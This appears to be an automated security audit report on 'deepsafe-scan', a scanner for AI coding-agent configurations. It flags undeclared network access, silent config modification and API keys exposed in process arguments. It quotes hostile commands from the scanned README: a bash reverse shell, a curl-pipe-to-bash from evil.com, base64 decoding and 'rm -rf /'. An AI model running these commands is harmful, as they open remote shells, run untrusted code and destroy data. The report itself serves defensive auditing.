deepsafe-scan Security Report — High Risk | ClawSafe

68 /100

deepsafe-scan

Preflight security scanner for AI coding agents - scans deployment config, skills/MCP servers, memory/sessions, and AI agent config files

DeepSafe Scan is a legitimate security scanner but contains undeclared behaviors: auto-modifies openclaw.json config to enable endpoints, and uses network access via subprocess that is not declared in allowed-tools.

Skill Namedeepsafe-scan

Duration77.2s

Enginepi

⛔

Do not install this skill

Do not install without explicit user consent. Request network access declaration in SKILL.md. Review config auto-modification behavior.

Attack Chain 5 steps

◎

Entry Skill installed via legitimate OpenClaw marketplace

SKILL.md:1

⬡

Escalation Scanner reads user's openclaw.json config

scripts/scan.py:1

⬡

Escalation Auto-modifies openclaw.json to enable chatCompletions endpoint

scripts/llm_client.py:213

⬡

Escalation Credential auto-detection accesses ANTHROPIC_API_KEY/OPENAI_API_KEY from environment

scripts/llm_client.py:124

⬡

Escalation API key passed to subprocess as argv, visible in process listing

scripts/scan.py:88

Findings 5 items

Severity	Finding	Location
High	Network access not declared in SKILL.md Doc Mismatch The skill uses urllib to make HTTP requests to LLM APIs (api.anthropic.com, api.openai.com, OpenClaw Gateway) but SKILL.md only declares Bash(python3:), Bash(cat:), and Read. Network access is a critical permission that should be declared. `urllib.request.Request with Bearer token to LLM endpoints` → Add network:READ to allowed-tools declaration in SKILL.md, or restructure to use only declared shell access for all network operations	`scripts/llm_client.py:1`
High	Auto-modifies openclaw.json without user consent Priv Escalation The _ensure_chat_completions_enabled() function silently modifies the user's openclaw.json config to enable chatCompletions endpoint. This unauthorized configuration change bypasses user consent and trust boundaries. `cfg.setdefault(...).setdefault(...).setdefault(...).setdefault('chatCompletions', {})['enabled'] = True` → Remove auto-modification or prompt user explicitly before making config changes	`scripts/llm_client.py:213`
Medium	API credentials passed as command-line arguments Credential Theft Probe scripts receive --api-key via subprocess.run() argv, exposing credentials in process listing (visible via ps). While necessary for function, this exposes secrets to process inspection. `cmd = [sys.executable, str(script), '--api-base', api_base, '--api-key', client.api_key, ...]` → Use environment variables or file-based credential passing instead of argv	`scripts/scan.py:88`
Medium	Auto-detection of API credentials from multiple sources Sensitive Access The LLM client auto-detects and uses credentials from OpenClaw config, environment variables (ANTHROPIC_API_KEY, OPENAI_API_KEY), and explicit arguments. While necessary for the scanner's function, this represents invasive credential access. `anthropic_key = os.environ.get('ANTHROPIC_API_KEY', '')` → Document this behavior clearly and provide --no-llm option to disable credential detection	`scripts/llm_client.py:124`
Low	README.md contains example malicious patterns Doc Mismatch The README.md lines 155-161 contain documented examples of dangerous patterns (reverse shell, curl\|bash RCE, base64 exec, rm -rf). These are documentation/examples for what the scanner detects, not actual malicious code, but could trigger false positives in some scanners. `bash -i >& /dev/tcp/10.0.0.1/4444 0>&1` → Move these examples to a separate 'threat-patterns' reference document to avoid confusion	`README.md:155`

Resource	Declared	Inferred	Status	Evidence
Filesystem	`READ`	`READ`	✓ Aligned	SKILL.md: allowed-tools includes Read
Shell	`WRITE`	`WRITE`	✓ Aligned	SKILL.md: allowed-tools includes Bash(python3:), Bash(cat:)
Network	`NONE`	`READ`	✗ Violation	scripts/scan.py: subprocess runs probes making urllib HTTP calls; llm_client.py:…
Environment	`NONE`	`READ`	✗ Violation	llm_client.py: reads ANTHROPIC_API_KEY, OPENAI_API_KEY, OPENCLAW_GATEWAY_TOKEN

5 Critical 15 findings

💀

Critical Dangerous Command 危险 Shell 命令

bash -i >&

README.md:155

💀

Critical Dangerous Command 危险 Shell 命令

/dev/tcp/

README.md:155

💀

Critical Dangerous Command 危险 Shell 命令

curl https://evil.com/x.sh \| bash

README.md:156

🔒

Critical Encoded Execution Base64 编码执行（代码混淆）

base64 -d

README.md:159

💀

Critical Dangerous Command 危险 Shell 命令

rm -rf /

README.md:161

🔗

Medium External URL 外部 URL

https://img.shields.io/badge/python-3.9%2B-blue.svg

README.md:5

🔗

Medium External URL 外部 URL

https://python.org

README.md:5

🔗

Medium External URL 外部 URL

https://img.shields.io/badge/deps-zero-green.svg

README.md:6

🔗

Medium External URL 外部 URL

https://img.shields.io/badge/works%20with-OpenClaw%20%7C%20Claude%20Code%20%7C%20Cursor%20%7C%20Codex-blueviolet.svg

README.md:7

🔗

Medium External URL 外部 URL

https://evil.com/x.sh

README.md:156

🔗

Medium External URL 外部 URL

https://healthcheck.dev-tools.sh/ping

demo/awesome-ai-rules/AGENTS.md:19

🔗

Medium External URL 外部 URL

https://api.analytics-cdn.dev/v1/event

demo/awesome-ai-rules/CLAUDE.md:15

🔗

Medium External URL 外部 URL

http://127.0.0.1:11434/v1

scripts/probes/persuasion_probe.py:391

🔗

Medium External URL 外部 URL

https://hooks\.slack\.com/services/T[A-Z0-9

scripts/scan.py:932

📧

Info Email 邮箱地址

[email protected]

README.md:157

File Tree

19 files · 264.4 KB · 5683 lines

Python 6f · 3481L Markdown 8f · 1232L JSON 4f · 967L Text 1f · 3L

├─ ▾ 📁 data

│ ├─ 📋 halueval_samples.json JSON 901L · 65.9 KB

│ ├─ 📋 manipulation_persuasion_topics.json JSON 40L · 981 B

│ ├─ 📋 prompts.json JSON 21L · 5.0 KB

│ └─ 📄 qa_evaluation_instruction.txt Text 3L · 224 B

├─ ▾ 📁 demo

│ └─ ▾ 📁 awesome-ai-rules

│ ├─ 📝 AGENTS.md Markdown 24L · 473 B

│ ├─ 📝 CLAUDE.md Markdown 26L · 627 B

│ └─ 📝 README.md Markdown 26L · 681 B

├─ ▾ 📁 docs

│ └─ 📝 plan-cross-platform-evolution.md Markdown 615L · 22.6 KB

├─ ▾ 📁 scripts

│ ├─ ▾ 📁 probes

│ │ ├─ 🐍 deception_probe.py Python 483L · 19.5 KB

│ │ ├─ 🐍 halueval_probe.py Python 327L · 11.4 KB

│ │ ├─ 🐍 persuasion_probe.py Python 475L · 17.8 KB

│ │ └─ 🐍 sandbagging_probe.py Python 415L · 14.3 KB

│ ├─ 🐍 llm_client.py Python 234L · 8.7 KB

│ └─ 🐍 scan.py Python 1547L · 75.9 KB

├─ 📋 _meta.json JSON 5L · 132 B

├─ 📝 AGENTS.md Markdown 75L · 2.5 KB

├─ 📝 CLAUDE.md Markdown 79L · 2.5 KB

├─ 📝 README.md Markdown 255L · 9.3 KB

└─ 📝 SKILL.md Markdown 132L · 5.9 KB

Dependencies 1 items

Package	Version	Source	Known Vulns	Notes
`urllib (stdlib)`	`N/A`	python3 built-in	No	Zero external dependencies

Security Positives

✓ Uses only Python stdlib (no external dependencies) - reduces supply chain risk

✓ Skips LLM features gracefully when no API credentials found (--no-llm flag works)

✓ Legitimate security scanning tool with documented purpose

✓ Probes are executed as subprocess with python3 - aligned with declared Bash(python3:*) permission

✓ Open source with transparent implementation

Scan Report

Attack Chain 5 steps

Findings 5 items

File Tree

Dependencies 1 items

Security Positives